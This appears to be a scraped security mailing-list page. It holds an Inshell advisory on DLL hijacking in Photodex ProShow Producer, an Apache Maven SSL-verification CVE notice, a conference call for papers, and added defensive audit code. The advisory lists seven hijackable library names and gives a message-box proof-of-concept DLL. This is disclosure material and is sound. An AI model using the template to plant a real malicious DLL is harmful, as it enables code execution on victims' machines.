Review: Add tags & remove tags

tr class=tablerow1_trtd class=tablerow1 align=left valign=top 

[IA48] Photodex ProShow Producer v5.0.3297 Insecure Library Loading Vulnerability

2013-02-25 Thread Inshell Security
Inshell Security Advisory
http://www.inshell.net


1. ADVISORY INFORMATION
---
Product:        Photodex ProShow Producer
Vendor URL:     www.photodex.com
Type:           Uncontrolled Search Path Element [CWE-427]
Date found:     2013-02-23
Date published: 2013-02-23
CVSSv2 Score:   4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE:            -


2. CREDITS
--
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.


3. VERSIONS AFFECTED

Photodex ProShow Producer v5.0.3297, older versions may be affected too.


4. VULNERABILITY DESCRIPTION

An insecure library loading vulnerability has been identified in
Photodex ProShow Producer v5.0.3297.

The application uses a fixed path to look for specific files or
libraries. This path includes directories that may not be trusted or
under user control.

By placing a custom version of a library in the application path, the
program will load it before the legitimate version. This allows an
attacker to inject custom code that will be run with the privilege of
the program or user executing the program. The following libraries could
be hijacked in this way:

d3d9.dll
dbghelp.dll
dciman32.dll
ddraw.dll
midimap.dll
mscms.dll
ws2help.dll


5. PROOF-OF-CONCEPT (CODE / Exploit)

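// wine gcc -Wall -shared inject.c -o ddraw.dll
#include <windows.h>

// Proof-of-concept DLL: shows a message box when the library is loaded.
BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)
{
    // DLL_PROCESS_ATTACH is delivered once, when the process maps the DLL.
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        MessageBox(0, "DLL Injection", "DLL Injection", 0);
    }
    return TRUE;
}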


For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/48


6. SOLUTION
---
None


7. REPORT TIMELINE
--
2013-02-23: Discovery of the vulnerability
2013-02-23: Full Disclosure because the vendor ignored previous
reports.


8. REFERENCES
-
http://security.inshell.net/advisory/48
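
An added check for the condition described in section 4 (not part of the Inshell advisory): it lists copies of the seven named libraries that sit in an application directory, where the advisory says they are loaded before the legitimate version. The function names, the `proshow.exe` file name and the file contents are constructed for the example.

```python
import hashlib
import os
import tempfile

# Library names listed in the advisory as loadable from the application path.
HIJACKABLE = ("d3d9.dll", "dbghelp.dll", "dciman32.dll", "ddraw.dll",
              "midimap.dll", "mscms.dll", "ws2help.dll")


def find_shadowing_dlls(app_dir, names=HIJACKABLE):
    """Return one finding per regular file in app_dir named like a listed DLL.

    Windows file names are case-insensitive, so DDRAW.DLL and ddraw.dll are
    the same library to the loader; the comparison is done in lower case.
    """
    wanted = {n.lower() for n in names}
    findings = []
    for entry in sorted(os.scandir(app_dir), key=lambda e: e.name.lower()):
        if entry.name.lower() not in wanted or not entry.is_file():
            continue
        with open(entry.path, "rb") as fh:
            digest = hashlib.sha256(fh.read()).hexdigest()
        findings.append({"name": entry.name, "path": entry.path,
                         "size": entry.stat().st_size, "sha256": digest})
    return findings


def demo():
    """Build a constructed install directory and audit it."""
    with tempfile.TemporaryDirectory() as app_dir:
        for name, data in (("proshow.exe", b"MZ-app"),        # constructed
                           ("DDraw.DLL", b"MZ-planted"),       # constructed
                           ("readme.txt", b"notes"),           # constructed
                           ("mscms.dll", b"MZ-planted-2")):    # constructed
            with open(os.path.join(app_dir, name), "wb") as fh:
                fh.write(data)
        # A directory with a matching name is not a loadable library.
        os.mkdir(os.path.join(app_dir, "d3d9.dll"))
        return [(f["name"], f["size"]) for f in find_shadowing_dlls(app_dir)]


if __name__ == "__main__":
    for name, size in demo():
        print(f"review: {name} ({size} bytes) sits beside the executable")
```

A hit is a prompt for review rather than proof of tampering; compare the reported SHA-256 against the files the vendor's installer ships.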


Fwd: [SECURITY] CVE-2013-0253 Apache Maven 3.0.4

2013-02-25 Thread Olivier Lamy
CVE-2013-0253 Apache Maven

Severity: Medium

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Maven 3.0.4
- Apache Maven Wagon 2.1, 2.2, 2.3

 Description:
Apache Maven 3.0.4 (with Apache Maven Wagon 2.1) has introduced a non-secure
SSL mode by default. This mode disables all SSL certificate checking,
including: host name verification, date validity, and certificate
chain. Not validating the certificate introduces the possibility of a
man-in-the-middle attack.

All users are recommended to upgrade to Apache Maven 3.0.5 and Apache
Maven Wagon 2.4.

 Credit
This issue was identified by Graham Leggett

--
The Apache Maven Team
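
The three checks the advisory lists, as an added Python illustration (not Maven or Wagon code, and not part of the original message): `failed_checks` reports which of them a peer certificate fails, and `accepts(..., checking=False)` models the non-secure default. The host names, certificate fields and function names are constructed; the dictionary layout is the one `ssl.SSLSocket.getpeercert()` returns.

```python
import calendar
import ssl


def _host_matches(pattern, hostname):
    """Case-insensitive match; '*' may stand only for the whole left-most label."""
    p, h = pattern.lower().split("."), hostname.lower().split(".")
    if len(p) != len(h):
        return False
    if p[0] == "*" and len(p) > 2:
        return p[1:] == h[1:]
    return p == h


def failed_checks(cert, hostname, now, chain_trusted):
    """Return the checks named in the advisory that this peer fails.

    cert          -- dict in the format returned by ssl.SSLSocket.getpeercert()
    now           -- current time, seconds since the epoch (UTC)
    chain_trusted -- outcome of the TLS library's chain validation, which a
                     client gets by leaving verify_mode at ssl.CERT_REQUIRED
    """
    failures = []
    names = [v for kind, v in cert.get("subjectAltName", ()) if kind == "DNS"]
    if not any(_host_matches(n, hostname) for n in names):
        failures.append("host name")
    not_before = ssl.cert_time_to_seconds(cert["notBefore"])
    not_after = ssl.cert_time_to_seconds(cert["notAfter"])
    if not not_before <= now <= not_after:
        failures.append("date validity")
    if not chain_trusted:
        failures.append("certificate chain")
    return failures


def accepts(cert, hostname, now, chain_trusted, checking=True):
    """checking=False models the non-secure default the advisory describes."""
    return not checking or not failed_checks(cert, hostname, now, chain_trusted)


# Constructed sample data (assumptions, not taken from the advisory).
NOW = calendar.timegm((2013, 2, 25, 0, 0, 0))
UNTRUSTED = {"subjectAltName": (("DNS", "proxy.example.net"),),
             "notBefore": "Jan  1 00:00:00 2011 GMT",
             "notAfter": "Jan  1 00:00:00 2012 GMT"}
GOOD = {"subjectAltName": (("DNS", "*.example.org"),),
        "notBefore": "Jan  1 00:00:00 2013 GMT",
        "notAfter": "Jan  1 00:00:00 2014 GMT"}

if __name__ == "__main__":
    host = "repo.example.org"
    print("fails:", failed_checks(UNTRUSTED, host, NOW, chain_trusted=False))
    print("accepted with checking on: ", accepts(UNTRUSTED, host, NOW, False))
    print("accepted with checking off:", accepts(UNTRUSTED, host, NOW, False,
                                                 checking=False))
```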


CONFidence 2013 - Call for Papers - 28-29.05.2013 Krakow, Poland

2013-02-25 Thread Andrzej Targosz

Calling all practitioners in the field of IT security!
The 11th edition of the international IT security conference, CONFidence 
2013, is taking place on May 28/29, 2013 (as usual it will be close to 
BerlinSides and PXE so if you plan to be around Krakow or Berlin you 
have to try to be a part of all of that:)



We invite all to send the proposed topic and abstracts of presentation 
till the 28th February 2013. Please, remember that CONFidence is an 
open, international conference and all presentations should be given in 
English.
If you want to send a hot, fresh topic we can wait for your submission 
till the 5th March 2013 but we have to know about it so you have to send 
us a short note.


The answer to CfP should include:
# name, last name and e-mail address of the potential speaker
# speaker's short bio, describing his experience and skills
# speaker's place of residence
# presentation topic with short description of proposed lecture (no more 
than 500 words)

# non-standard technical requirements

Applications should be sent to andrzej.targosz{@}proidea.org.pl or 
slawek.j...@proidea.org.pl till the 28th February, 2013.


DISCLAIMERS
Everybody says that but we really do not accept marketing, non-technical 
presentations aimed at presenting and selling any products. If your 
lecture presents company or its product, please do not send it!



SPONSORSHIP- let us know if you want to support security community in 
Central/Eastern Europe.
CONFidence offers many sponsorship opportunities. 100% of the 
sponsorship goes directly to the attendees. If you are interested in 
sponsoring, please contact slawek.jabs{@}proidea.org.pl


CONFidence conference is a non-profit event and speakers are not being 
paid. However, we always try to provide financial help and
cover travel expenses and accommodation. It needs to be agreed upon 
after acceptance of the submission, though.


CONFidence Team
http://2013.confidence.org.pl

--
Andrzej Targosz :1024D/E2DE0833 :gpg:  http://www.proidea.org.pl/gpg/at
Fundacja Wspierania Edukacji Informatycznej PROIDEA
ul. Konarskiego 44 lok.6, 30-046 Krakow tel./fax: +4812 6171183
e-mail: andrzej.targ...@proidea.org.pl
www.proidea.org.pl

Join me at BitSpiration (Krakow, June 13-14) It's all about trading goods
http://bitspiration.com